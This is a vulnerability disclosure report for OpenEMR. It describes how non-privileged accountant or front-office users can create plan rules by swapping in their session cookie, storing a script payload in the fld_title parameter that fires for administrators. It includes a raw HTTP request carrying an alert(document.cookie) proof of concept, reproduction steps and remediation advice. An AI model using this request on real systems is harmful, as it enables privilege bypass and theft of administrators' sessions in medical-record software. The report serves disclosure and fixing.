Non-Privilege User Can Created New Rule and Lead to Stored Cross Site Scripting in openemr/openemr
Mar 21st 2022
Stored Cross Site-Scripting (XSS)
###Authentication Required? Yes
Non-privilege users (accounting, front-office) can create new rule and allows them to inject arbitrary web script that led to Stored Cross Site Scripting. This vulnerability found in “/interface/super/rules/index.php?action=edit!submit_summary” on one parameter (fid_title). The XSS payload will be fired in the Plan Rules that can only be viewed by privileged users.
nsure to HTML encode before inserting any untrusted data into HTML element content. Ensure all inputs entered by user should be sanitized and validated before processing and storage. Inputs should be filtered by the application, for example removing special characters such as < and > as well as special words such as script.
Aden Yap Chuen Zhen (firstname.lastname@example.org)
Rizan, Sheikh (email@example.com)
Ali Radzali (firstname.lastname@example.org)
Login to EMR using admin and we can see there is a Rules tab in (Administration > Practice > Rules).
Login to EMR using non-privilege users (accountant, front-office) and we can see there is no Rules tab in (Administration > Practice).
Using Burp, we intercept the Admin request to add new rules in Rules tab and swap the “OpenEMR” cookie using an Accountant cookie and we are be able to create new rule that contain our XSS payload.
The Raw Request looks like:
POST /openemr/interface/super/rules/index.php?action=edit!submit_summary HTTP/1.1 Host: 192.168.153.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 120 Origin: http://192.168.153.129 Connection: close Referer: http://192.168.153.129/openemr/interface/super/rules/index.php?action=edit!summary Upgrade-Insecure-Requests: 1 Cookie: OpenEMR=zfLGOSTbtLDyoLLIFMlBPUrBWNNlzrYN5y60Z-BItjBhTNw0; id=&fld_title=<script>alert(document.cookie)</script>&fld_developer=&fld_funding_source=&fld_release=&fld_web_reference=
Go to Rules page (Administration > Practice > Rules) and Click “Go” on Plans Configuration.
The XSS will be fired in any Plans configurations. For example, an Admin can select any plans and the cookies of the admin will be pop out in alert box.